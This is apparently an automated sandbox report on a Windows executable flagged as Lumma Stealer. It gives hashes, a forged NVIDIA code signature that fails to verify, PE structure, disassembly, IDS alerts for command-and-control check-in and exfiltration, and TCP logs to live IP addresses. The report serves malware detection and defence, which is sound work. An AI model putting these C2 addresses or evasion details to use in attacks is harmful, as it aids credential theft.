	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	104.21.74.40 104.21.11.101
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.74.40 104.21.11.101
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	104.21.74.40 104.21.11.101
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.74.40 104.21.11.101
	Vq50tK1Nx2.exe	Get hash	malicious	LummaC	Browse	104.21.74.40 104.21.11.101
	O53VxanH6A.exe	Get hash	malicious	LummaC	Browse	104.21.74.40 104.21.11.101
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	104.21.74.40 104.21.11.101
	IzDjbVdHha.exe	Get hash	malicious	LummaC	Browse	104.21.74.40 104.21.11.101
	Wvo9FU4qo9.exe	Get hash	malicious	LummaC	Browse	104.21.74.40 104.21.11.101

Dropped Files

⊘No context

Created / dropped Files

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\0x001f00000004676d-1858.exe
File Type:	assembler source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	14402
Entropy (8bit):	4.874636730022465
Encrypted:	false
SSDEEP:	384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
MD5:	DF0EFD0545733561C6E165770FB3661C
SHA1:	0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
SHA-256:	A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
SHA-512:	3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
Malicious:	false
Reputation:	low
Preview:	AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.569168685333213
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0x001f00000004676d-1858.exe
File size:	571'432 bytes
MD5:	ab4263d8bd7675f83c88db675d103f3e
SHA1:	8e0496273f2114ff93831c89c2588c4bf6e3f031
SHA256:	1c8bbdd85f8966054492c3e859c42657e50398f01325b064426a584670646486
SHA512:	29cff72b4aa916f9fa3fa3cec3e3a573c177a2a6d61aa5fa218b575abc5644e8021571157c6f5ec679e57c56d804da5ba5be416156485dd365c88bf64b272167
SSDEEP:	12288:WYO6Dqzihouxpa+yW7baOWofIN7mxWQrDEb9+NYFEO:PO6DThou2+ysNjINixWVUNYFt
TLSH:	D0C4E0127690C4B2D9571A7759B5D7391A3FB8200F2296CB93984FBDCEB03C14E31A6E
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@..................................W....@.................................\|j..<..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4104a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	96d90e8808da099bc17e050394f447e7

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/01/2023 19:00:00 16/01/2026 18:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
call 00007F4380D56D5Ah
jmp 00007F4380D56BBDh
mov ecx, dword ptr [0043B680h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F4380D56D56h
test esi, ecx
jne 00007F4380D56D78h
call 00007F4380D56D81h
mov ecx, eax
cmp ecx, edi
jne 00007F4380D56D59h
mov ecx, BB40E64Fh
jmp 00007F4380D56D60h
test esi, ecx
jne 00007F4380D56D5Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0043B680h], ecx
not ecx
pop edi
mov dword ptr [0043B6C0h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00436D00h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00436CB8h]
xor dword ptr [ebp-04h], eax
call dword ptr [00436CB4h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [00436D50h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 0043CF48h
call dword ptr [00436D28h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F4380D5DB33h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x36a7c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8e000	0x3fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x89200	0x2628	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3f000	0x2744	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x32608	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ea98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x36c3c	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2b4ca	0x2b600	ebf84c6b836020b1a66433a898baeab7	False	0.5443702719740634	data	6.596404756541432	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2d000	0xc50c	0xc600	96e76e7ef084461591b1dcd4c2131f05	False	0.40260022095959597	data	4.741850626178578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3a000	0x3714	0x2800	d87fd4546a2b39263a028b496b33108f	False	0.29814453125	data	5.024681407682101	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x3e000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x3f000	0x2744	0x2800	c7508b57e36483307c47b7dd73fc0c85	False	0.75166015625	data	6.531416896423856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x42000	0x4ba00	0x4ba00	14b536f3b9dfafb92c38280374b415ea	False	1.0003260588842975	data	7.999364581884296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x8e000	0x3fc	0x400	4243bfa36d7c6187562be2edfa0b46c2	False	0.443359375	data	3.391431520369637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8e058	0x3a4	data	English	United States	0.44849785407725323

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

USER32.dll

ShowWindow

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T15:34:57.678046+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.11.101	443	TCP
2024-12-27T15:35:28.125233+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49708	104.21.11.101	443	TCP
2024-12-27T15:35:28.125233+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	104.21.11.101	443	TCP
2024-12-27T15:35:29.900191+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49741	104.21.74.40	443	TCP
2024-12-27T15:35:41.808798+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49741	104.21.74.40	443	TCP
2024-12-27T15:35:41.808798+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49741	104.21.74.40	443	TCP
2024-12-27T15:35:43.058758+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49770	104.21.74.40	443	TCP
2024-12-27T15:35:43.824284+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49770	104.21.74.40	443	TCP
2024-12-27T15:35:43.824284+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49770	104.21.74.40	443	TCP
2024-12-27T15:35:45.528794+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49776	104.21.74.40	443	TCP
2024-12-27T15:35:46.501541+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49776	104.21.74.40	443	TCP
2024-12-27T15:35:47.983491+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49782	104.21.74.40	443	TCP
2024-12-27T15:35:50.294508+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49790	104.21.74.40	443	TCP
2024-12-27T15:35:52.910954+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49796	104.21.74.40	443	TCP
2024-12-27T15:35:56.040623+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49804	104.21.74.40	443	TCP
2024-12-27T15:35:59.839892+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49814	104.21.74.40	443	TCP
2024-12-27T15:36:00.622792+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49814	104.21.74.40	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 15:34:56.454658031 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:34:56.454706907 CET	443	49708	104.21.11.101	192.168.2.5
Dec 27, 2024 15:34:56.454915047 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:34:56.456233025 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:34:56.456252098 CET	443	49708	104.21.11.101	192.168.2.5
Dec 27, 2024 15:34:57.677958965 CET	443	49708	104.21.11.101	192.168.2.5
Dec 27, 2024 15:34:57.678045988 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:34:57.696588039 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:34:57.696600914 CET	443	49708	104.21.11.101	192.168.2.5
Dec 27, 2024 15:34:57.697004080 CET	443	49708	104.21.11.101	192.168.2.5
Dec 27, 2024 15:34:57.748670101 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:34:57.834709883 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:34:57.834732056 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:34:57.834870100 CET	443	49708	104.21.11.101	192.168.2.5
Dec 27, 2024 15:35:28.124880075 CET	49708	443	192.168.2.5	104.21.11.101
Dec 27, 2024 15:35:28.599247932 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:28.599301100 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:28.599431992 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:28.599901915 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:28.599917889 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:29.900074005 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:29.900191069 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:29.903950930 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:29.903979063 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:29.904216051 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:29.914422035 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:29.914452076 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:29.914499998 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:41.808820963 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:41.808902979 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:41.808953047 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:41.810235023 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:41.810247898 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:41.810267925 CET	49741	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:41.810277939 CET	443	49741	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:41.819549084 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:41.819633961 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:41.819710016 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:41.820099115 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:41.820127964 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.058653116 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.058758020 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.060103893 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.060118914 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.060323954 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.061631918 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.061654091 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.061693907 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.824326038 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.824363947 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.824390888 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.824418068 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.824424028 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.824455023 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.824472904 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.832340956 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.832398891 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.832408905 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.840650082 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.840709925 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.840720892 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.852024078 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.852092028 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.852101088 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.904918909 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.943841934 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:43.998692989 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:43.998706102 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:44.019823074 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:44.019855976 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:44.019926071 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:44.020021915 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:44.020021915 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:44.036551952 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:44.036590099 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:44.036667109 CET	49770	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:44.036683083 CET	443	49770	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:44.268234015 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:44.268300056 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:44.268376112 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:44.268708944 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:44.268724918 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:45.528600931 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:45.528794050 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:45.530123949 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:45.530138969 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:45.530462027 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:45.531632900 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:45.531785965 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:45.531826019 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:46.501543999 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:46.501681089 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:46.501739025 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:46.501863956 CET	49776	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:46.501884937 CET	443	49776	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:46.677134037 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:46.677156925 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:46.677231073 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:46.677669048 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:46.677683115 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:47.983419895 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:47.983490944 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:47.984693050 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:47.984699965 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:47.985014915 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:47.986752033 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:47.986855030 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:47.986886024 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:47.989352942 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:48.031333923 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:48.878200054 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:48.878312111 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:48.878467083 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:48.878880024 CET	49782	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:48.878895044 CET	443	49782	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:49.083307028 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:49.083417892 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:49.083575964 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:49.083910942 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:49.083945036 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:50.294317961 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:50.294507980 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:50.295543909 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:50.295561075 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:50.295764923 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:50.297256947 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:50.297416925 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:50.297454119 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:50.297511101 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:50.297522068 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:51.285820961 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:51.285916090 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:51.285979986 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:51.286048889 CET	49790	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:51.286083937 CET	443	49790	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:51.607543945 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:51.607630968 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:51.607722044 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:51.608088017 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:51.608124018 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:52.910872936 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:52.910953999 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:52.912060022 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:52.912071943 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:52.912293911 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:52.913446903 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:52.913541079 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:52.913552046 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:54.168708086 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:54.168792963 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:54.168898106 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:54.169125080 CET	49796	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:54.169161081 CET	443	49796	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:54.781445980 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:54.781474113 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:54.781682968 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:54.782052994 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:54.782068014 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.040498972 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.040622950 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.041774988 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.041785002 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.042001009 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.058043003 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.058696032 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.058732033 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.058813095 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.058845043 CET	443	49804	104.21.74.40	192.168.2.5
